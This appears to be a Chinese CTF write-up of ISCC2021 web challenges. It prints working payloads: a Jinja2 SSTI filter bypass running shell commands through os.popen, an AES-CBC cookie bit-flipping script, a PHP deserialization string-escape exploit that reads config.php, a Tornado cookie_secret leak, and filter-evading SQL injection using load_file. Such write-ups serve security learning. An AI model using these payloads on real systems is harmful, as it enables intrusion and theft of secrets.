当前位置:网站首页>ISCC2021——web部分
ISCC2021——web部分
2022-08-04 05:27:00 【Ki10Moc】
练武
ISCC客服冲冲冲(一)
该题目需要左边的客服票数高于右边的
我会的就两种方法,毕竟是废物嘛,允许
1、
把左右按钮换一下
然后就
2、在控制台输入
回车,走你
你涨啊,涨啊,接着涨啊…没吃饭吗
这是啥
发现一堆这
Jsfuck解密。
Web01
太明显了 robots协议
和攻防世界如出一辙,不让访问那就访问
得到源码
<?php
<p>code.txt</p>
if (isset ($_GET['password'])) {
if (preg_match ("/^[a-zA-Z0-9]+$/", $_GET['password']) === FALSE)
{
echo '<p>You password must be alphanumeric</p>';
}
else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)
{
if (strpos ($_GET['password'], '*-*') !== FALSE)
{
die('Flag: ' . $flag);
}
else
{
echo('<p>*-* have not been found</p>');
}
}
else
{
echo '<p>Invalid password</p>';
}
}
?>
代码审计…
ereg函数要求passwd只能有一个或者多个数字、大小写字母。
strlen限制了长度,要求长度小于8,但值大于9999999,利用科学计数法:1e8(e表示指数)
利用%00截断绕过
?password=1e8*-*
ISCC客服一号冲冲冲(二)
下载图片(找源码确实,没师傅hint,还真找不到)
下载后LSB隐写,Blue的0通道
咦,有东西
源码:
<?php
define("SECRET_KEY", '101010031231243214');
define("METHOD", "aes-128-cbc");
session_start();
function get_random_iv(){
$random_iv='';
for($i=0;$i<16;$i++){
$random_iv.=chr(rand(1,255));
}
return $random_iv;
}
function login($info){
$iv = get_random_iv();
$plain = serialize($info);
$cipher = openssl_encrypt($plain, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv);
$_SESSION['username'] = $info['username'];
$_SESSION['password'] = $info['password'];
setcookie("iv", base64_encode($iv));
setcookie("cipher", base64_encode($cipher));
}
function check_login(){
if(isset($_COOKIE['cipher']) && isset($_COOKIE['iv'])){
$cipher = base64_decode($_COOKIE['cipher']);
$iv = base64_decode($_COOKIE["iv"]);
if($plain = openssl_decrypt($cipher, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv)){
$info = unserialize($plain) or die("<p>base64_decode('".base64_encode($plain)."') can't unserialize</p>");
$_SESSION['username'] = $info['username'];
}else{
die("ERROR!");
}
}
}
function show_homepage(){
if ($_SESSION["username"]==='admin'&& $_SESSION["password"]=== password)
{
echo '<p>Hello admin</p>';
echo '<p>Flag is '.flag.'</p>';
}
else if($_SESSION["password"] == password)
{
echo '<p>hello '.$_SESSION['username'].'</p>';
echo '<p>You can\'t see flag</p>';
}
else
{
echo '<p>Sorry,password is incorrect</p>';
}
}
if(isset($_POST['username']) && isset($_POST['password'])){
$username = (string)$_POST['username'];
$password = (string)$_POST['password'];
if($username === 'admin'){
exit('<p>admin are not allowed to login</p>');
}else{
$info = array('username'=>$username,'password'=>$password);
login($info);
show_homepage();
}
}else{
if(isset($_SESSION["username"])){
check_login();
show_homepage();
}else{
echo ' <body class="login-body"> <div id="wrapper" style = "width:800px; height:200px; overflow:hidden;"> <img class="img1" src="login.bmp" alt="login" /> </div> </body>';
}
}
?>
看到原页面,大概就是传username和password
但不能输入,受第一个题目的影响,我还在那找JS前段代码,找dis之类的字样,但其实已经完全跑偏了(菜)
进行传参
username=admik&password=1SCC_2o2l_KeFuu
抓包
这里是将我们传入的值进行序列化
得到一个iv和cipher,并且只有admimn才能看到flag,但矛盾的是我们不能以admin的身份上传值,那就需要字符翻转,将输入的admik的“k”变成admin的“n”。
CBC讲解:https://blog.csdn.net/csu_vc/article/details/79619309
最后附上脚本
将iv和cipher复制到左边,果然,我们不能访问flag
将cipher进行url解码
将解码后的cipher的值进行base64解码并且翻转字符
TqNbrcYMj35+XQQFPoFoNkqSrqL9ygnG4od7abehLv9NRyQvo89y5PeLuUuUT4P+5RqSH6MOxNJwuCMqR8lxEy82AOerWeHacK6JmKwy4IU=
替换原来的cipher,再进行url编码
发送
因为要修改第一轮的值,才能修改cipher的值。
但是vi作为第0轮密文进行解密,得到的结果却和第一轮不一样,所以无法序列化
同理,对iv进行url解码,放入脚本和刚才回显得到的无法序列化的内容得到新的iv值
将得到的新的iv值进行url编码再对原来的iv进行替换
发送
脚本:
<?php
$enc=base64_decode("回显无法序列化的内容");
$iv=base64_decode("iv原始的值进行url编码");
$cleartext = 'a:2:{s:8:"userna';
$newiv = '';
for ($i=0;$i<16;$i++){
$newiv=$newiv.chr(ord($iv[$i]) ^ ord($enc[$i]) ^ ord ($cleartext[$i]));
}
echo base64_encode($newiv);
?>
```php
<?php
$enc=base64_decode("cipher的值url解码");
$enc[13] = chr(ord($enc[13]) ^ ord("k") ^ ord ("n"));
echo base64_encode($enc);
?>
如果嫌url编码麻烦,可以直接写成
base64_decode(urldecode('iv或cipher的初始值'))
lovely ssti
看题目,ssti
ssti模板注入
没听说过…
两个payload
{
%set pp=(dict(pop=a))|join%}
{
%set xiahua=(lipsum|select|string|list)|attr(pp)(24)%}
{
%set g=(lipsum|select|string|list)|attr(pp)(1)%}
{
%set gb=(xiahua,xiahua,g,dict(bals=a,lo=a)|join,xiahua,xiahua)|join%}
{
%set gm=(xiahua,xiahua,g,dict(e=a,titem=a)|join,xiahua,xiahua)|join%}
{
%set bl=(xiahua,xiahua,dict(builtins=a)|join,xiahua,xiahua)|join%}
{
%set chcr=(lipsum|attr(gb)|attr(gm)(bl))|attr("ge""t")("ch""r")%}
{
%set dian=chcr(46)%}
{
%set space=chcr(32)%}
{
%set xing=chcr(42)%}
{
%set shell=("cat ","requirements",dian,"txt")|join%}
{
%set shell2=("find / -name ",xing,"fl","ag",xing)|join%}
{
%set shell3=("cat /usr/fl","ag",xiahua,"is",xiahua,"here",dian,"txt")|join%}
{
{
lipsum|attr(gb)|attr(gm)("o""s")|attr("po""pen")(shell3)|attr("read")()}}
{
% set xiahua=(config|string)[14]%}
{
% set gb=(xiahua,xiahua,"globals",xiahua,xiahua)|join %}
{
% set bl=(xiahua,xiahua,"builtins",xiahua,xiahua)|join %}
{
% set cr=(lipsum|attr(gb)|attr("get")(bl))["ch""r"] %}
{
% set dian=cr(46)%}
{
% set xing =cr(42)%}
{
% set shell=("find / -name ",xing,"fla",xing)|join%}
{
% set shell4 = "cat /usr/fla??is?here?txt"%}
{
{
(lipsum|attr(gb)|attr("get")("o""s")|attr("po""pen")(shell4))|attr("read")()}}
这里附上师傅的WP
https://blog.csdn.net/jvkyvly/article/details/116953370
登录
www.zip得到源码
index.php
<?php
require_once('class.php');
if($_SESSION['username']) {
header('Location: profile.php');
exit;
}
if($_POST['username'] && $_POST['password']) {
$username = $_POST['username'];
$password = $_POST['password'];
if(strlen($username) < 3 or strlen($username) > 16)
die('Invalid user name');
if(strlen($password) < 3 or strlen($password) > 16)
die('Invalid password');
if($user->login($username, $password)) {
$_SESSION['username'] = $username;
header('Location: profile.php');
exit;
}
else {
die('Invalid user name or password');
}
}
else {
?>
<!DOCTYPE html>
<html>
<head>
<title>Login</title>
<link href="static/bootstrap.min.css" rel="stylesheet">
<script src="static/jquery.min.js"></script>
<script src="static/bootstrap.min.js"></script>
</head>
<body>
<div class="container" style="margin-top:100px">
<form action="index.php" method="post" class="well" style="width:220px;margin:0px auto;">
<img src="static/piapiapia.gif" class="img-memeda " style="width:180px;margin:0px auto;">
<h3>Login</h3>
<label>Username:</label>
<input type="text" name="username" style="height:30px"class="span3"/>
<label>Password:</label>
<input type="password" name="password" style="height:30px" class="span3">
<button type="submit" class="btn btn-primary">LOGIN</button>
</form>
</div>
</body>
</html>
<?php
}
?>
输入用户名密码正确后,将跳转到profile.php页面。
profile.php
<?php
require_once('class.php');
if($_SESSION['username'] == null) {
die('Login First');
}
$username = $_SESSION['username'];
$profile=$user->show_profile($username);
if($profile == null) {
header('Location: update.php');
}
else {
$profile = unserialize($profile);
$phone = $profile['phone'];
$email = $profile['email'];
$nickname = $profile['nickname'];
$photo = base64_encode(file_get_contents($profile['photo']));
?>
<!DOCTYPE html>
<html>
<head>
<title>Profile</title>
<link href="static/bootstrap.min.css" rel="stylesheet">
<script src="static/jquery.min.js"></script>
<script src="static/bootstrap.min.js"></script>
</head>
<body>
<div class="container" style="margin-top:100px">
<img src="data:image/gif;base64,<?php echo $photo; ?>" class="img-memeda " style="width:180px;margin:0px auto;">
<h3>Hi <?php echo $nickname;?></h3>
<label>Phone: <?php echo $phone;?></label>
<label>Email: <?php echo $email;?></label>
</div>
</body>
</html>
<?php
}
?>
将输入的信息反序列化后输出
register.php
<?php
require_once('class.php');
if($_POST['username'] && $_POST['password']) {
$username = $_POST['username'];
$password = $_POST['password'];
if(strlen($username) < 3 or strlen($username) > 16)
die('Invalid user name');
if(strlen($password) < 3 or strlen($password) > 16)
die('Invalid password');
if(!$user->is_exists($username)) {
$user->register($username, $password);
echo 'Register OK!<a href="index.php">Please Login</a>';
}
else {
die('User name Already Exists');
}
}
else {
?>
<!DOCTYPE html>
<html>
<head>
<title>Login</title>
<link href="static/bootstrap.min.css" rel="stylesheet">
<script src="static/jquery.min.js"></script>
<script src="static/bootstrap.min.js"></script>
</head>
<body>
<div class="container" style="margin-top:100px">
<form action="register.php" method="post" class="well" style="width:220px;margin:0px auto;">
<img src="static/piapiapia.gif" class="img-memeda " style="width:180px;margin:0px auto;">
<h3>Register</h3>
<label>Username:</label>
<input type="text" name="username" style="height:30px"class="span3"/>
<label>Password:</label>
<input type="password" name="password" style="height:30px" class="span3">
<button type="submit" class="btn btn-primary">REGISTER</button>
</form>
</div>
</body>
</html>
<?php
}
?>
upload.php
<?php
require_once('class.php');
if($_SESSION['username'] == null) {
die('Login First');
}
if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {
$username = $_SESSION['username'];
if(!preg_match('/^\d{11}$/', $_POST['phone']))
die('Invalid phone');
if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
die('Invalid email');
if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
die('Invalid nickname');
$file = $_FILES['photo'];
if($file['size'] < 5 or $file['size'] > 1000000)
die('Photo size error');
move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
$profile['phone'] = $_POST['phone'];
$profile['email'] = $_POST['email'];
$profile['nickname'] = $_POST['nickname'];
$profile['photo'] = 'upload/' . md5($file['name']);
$user->update_profile($username, serialize($profile));
echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
}
else {
?>
<!DOCTYPE html>
<html>
<head>
<title>UPDATE</title>
<link href="static/bootstrap.min.css" rel="stylesheet">
<script src="static/jquery.min.js"></script>
<script src="static/bootstrap.min.js"></script>
</head>
<body>
<div class="container" style="margin-top:100px">
<form action="update.php" method="post" enctype="multipart/form-data" class="well" style="width:220px;margin:0px auto;">
<img src="static/piapiapia.gif" class="img-memeda " style="width:180px;margin:0px auto;">
<h3>Please Update Your Profile</h3>
<label>Phone:</label>
<input type="text" name="phone" style="height:30px"class="span3"/>
<label>Email:</label>
<input type="text" name="email" style="height:30px"class="span3"/>
<label>Nickname:</label>
<input type="text" name="nickname" style="height:30px" class="span3">
<label for="file">Photo:</label>
<input type="file" name="photo" style="height:30px"class="span3"/>
<button type="submit" class="btn btn-primary">UPDATE</button>
</form>
</div>
</body>
</html>
<?php
}
?>
将输入的信息序列化
class.php
<?php
require('config.php');
class user extends mysql{
private $table = 'users';
public function is_exists($username) {
$username = parent::filter($username);
$where = "username = '$username'";
return parent::select($this->table, $where);
}
public function register($username, $password) {
$username = parent::filter($username);
$password = parent::filter($password);
$key_list = Array('username', 'password');
$value_list = Array($username, md5($password));
return parent::insert($this->table, $key_list, $value_list);
}
public function login($username, $password) {
$username = parent::filter($username);
$password = parent::filter($password);
$where = "username = '$username'";
$object = parent::select($this->table, $where);
if ($object && $object->password === md5($password)) {
return true;
} else {
return false;
}
}
public function show_profile($username) {
$username = parent::filter($username);
$where = "username = '$username'";
$object = parent::select($this->table, $where);
return $object->profile;
}
public function update_profile($username, $new_profile) {
$username = parent::filter($username);
$new_profile = parent::filter($new_profile);
$where = "username = '$username'";
return parent::update($this->table, 'profile', $new_profile, $where);
}
public function __tostring() {
return __class__;
}
}
class mysql {
private $link = null;
public function connect($config) {
$this->link = mysql_connect(
$config['hostname'],
$config['username'],
$config['password']
);
mysql_select_db($config['database']);
mysql_query("SET sql_mode='strict_all_tables'");
return $this->link;
}
public function select($table, $where, $ret = '*') {
$sql = "SELECT $ret FROM $table WHERE $where";
$result = mysql_query($sql, $this->link);
return mysql_fetch_object($result);
}
public function insert($table, $key_list, $value_list) {
$key = implode(',', $key_list);
$value = '\'' . implode('\',\'', $value_list) . '\'';
$sql = "INSERT INTO $table ($key) VALUES ($value)";
return mysql_query($sql);
}
public function update($table, $key, $value, $where) {
$sql = "UPDATE $table SET $key = '$value' WHERE $where";
return mysql_query($sql);
}
public function filter($string) {
$escape = array('\'', '\\\\');
$escape = '/' . implode('|', $escape) . '/';
$string = preg_replace($escape, '_', $string);
$safe = array('select', 'insert', 'update', 'delete', 'where');
$safe = '/' . implode('|', $safe) . '/i';
return preg_replace($safe, 'hacker', $string);
}
public function __tostring() {
return __class__;
}
}
session_start();
$user = new user();
$user->connect($config);
config.php
<?php
$config['hostname'] = '127.0.0.1';
$config['username'] = 'root';
$config['password'] = '';
$config['database'] = '';
$flag = '';
?>
在这里有flag的关键信息
而在profile.php中了
$photo = base64_encode(file_get_contents($profile['photo']));
那这里的骚操作大致思路就是让 $profile['photo']
的值为config.php
,这样就可以变成
$photo = base64_encode(file_get_contents(`config.php`));
将config.php的页面用base64编码的形式输出
public function filter($string) {
$escape = array('\'', '\\\\');
$escape = '/' . implode('|', $escape) . '/';
$string = preg_replace($escape, '_', $string);
$safe = array('select', 'insert', 'update', 'delete', 'where');
$safe = '/' . implode('|', $safe) . '/i';
return preg_replace($safe, 'hacker', $string);
在class.php这里有filter过滤
upload.php这里也同样有过滤
if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
die('Invalid nickname');
选择用nickname[]=
来绕过
$safe = array('select', 'insert', 'update', 'delete', 'where');
$safe = '/' . implode('|', $safe) . '/i';
return preg_replace($safe, 'hacker', $string);
}
这里只有where是5位,在匹配到where后返回hacker是6位,这样,就会多一个位,就可以不断顶替,把我们想要的config.php给顶到file_get_contents
解析
payload:
";}s:5:"photo";s:10:"config.php";}
前面闭合,然后使photo的值为config.php
这里";}s:5:"photo";s:10:"config.php";}
一共是34位,每一个where会增加1位,所以我们需要34个where放入nickname[]
回到题目上
进入register注册
登陆进去到了upload界面
抓包
将这里修改为数组
再回到原页面找到图片的base64
解码
擂台
tornado
这个题目好像做过…
关于tornado
这是python的一个模块
可能存在模板注入
回到题目
flag.txt显示flag在fllllllllllllaaaaaag里面
但是无法直接访问(也就我这种小白还会去试试)
/welcome.txt
render
/hints.txt
md5(cookie_secret+md5(filename))
在hints.txt中给出了计算方法
即先将filename
MD5加密,再将cookie_secret
与MD5加密后的filename
进行MD5加密
所以我们需要filename
和cookie_secret
两者的值
根据flag.txt的提示我们尝试?filename=fllllllllllllaaaaaag
啊…这应该是也是某种注入吧
查看环境变量
?msg={
{
handler.settings}}
得到cookie_secret的值
<?php
$cookie='ef57c331-744f-4528-b434-9746317d4f6a';
$filename='/fllllllllllllaaaaaag';
echo md5($cookie.md5($filename));
?>
计算出filehash
1ad9b8e09fbe539bc5a6f2c8bc0ab5db
带参访问得到flag
easyweb
就很直白
注入
先判断一下闭合符号
试了一下发现–+的话直接die
应该是被过滤了
但#号是error
尝试把#url编码为%23
得到回显
空格也被过滤了
可以使用%0d代替
联合查询也被过滤
但双写可以使用
?id=0'%0dununionion%0dselselectect%0d1,2,3%23
得到回显
?id=0'%0Dununionion%0Dselselectect%0D1,database(),3%23
得到数据库名
?id=0'%0Dununionion%0Dselselectect%0D1,(selselectect%0Dgroup_concat(table_name)%0DFROM%0Dsys.schema_table_statistics_with_buffer),3%0D%23
试一下表名为flag
?id=0'%0dununionion%0dselselectect%0d1,(selselectect%0dflag%0dFROM%0discc_flag),3%0d%23
提示访问cccmd.php
得到源码
<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(preg_match("/[zxcvbMnlkjhgfsaoiuytreq]+|[ZXCVBNLKKJHGFSAOIUYTREQ]+|[0123456789]+|\(|\/|\*|\-|\+|\.|\{|\}|\[|\]|\'|\"|\?|\>|\<|\,|\)|\(|\&|\^|\%|\#|\@|\!/", $c)){
exit("die!!");
}else{
echo `$c`;
}
}else{
highlight_file(__FILE__);
}
?>
<!--flllllllllaaag.php-->
但这里的原码最重要的就是flllllllllaaag.php
,就是flag的位置
如果能走到这一步,前面的过滤应该也都知道了,没什么大用
?id=-1'%0duniunionon%0dselselectect%0d1,(load_file('/etc/apache2/sites-available/000-default.conf')),3%23 //此路径为默认
最后访问源码
本文尚有不足,后续会进行补全
本人水平极其低下,希望路过的大佬能指点
也希望和师傅们交流学习
本人也是兴趣选手,非本专业大一学生
只是纯爱好,还需要更多的学习
谢谢观看……
边栏推荐
- 8.03 Day34---BaseMapper query statement usage
- 编程Go:return、break、continue
- Deploy LVS-DR cluster [experimental]
- 基于C语言的学生信息管理系统_(更新版)_(附源码和安装包)_课程设计_**往事随風**的博客
- PHP实现异步执行程序
- 解决安装nbextensions后使用Jupyter Notebook时出现template_paths相关错误的问题
- OpenRefine开源数据清洗软件的GREL语言
- 关于let var 和const的区别以及使用
- 谷粒商城-基础篇(项目简介&项目搭建)
- 进入古诗文网站个人中心,绕过登录
猜你喜欢
随机推荐
C language -- operator details
嵌入式系统驱动初级【3】——字符设备驱动基础中_IO模型
关于let var 和const的区别以及使用
EntityComponentSystemSamples学习笔记
Unity动画生成工具
webrtc中的视频编码(一) 视频编码模块轮廓
即时通讯网 即时通讯音视频开发
MySQL数据库(基础)
强制结束进程
JS原型链
thymeleaf中onclick事件动态传递参数问题
webrtc中视频采集实现分析(二) 视频帧的分发
PHP实现异步执行程序
对象存储-分布式文件系统-MinIO-1:概念
FFmpeg源码分析:avformat_open_input
4.3 Annotation-based declarative transactions and XML-based declarative transactions
9、动态SQL
什么是跨域和同源
FLV格式详解
个人练习三剑客基础之模仿CSDN首页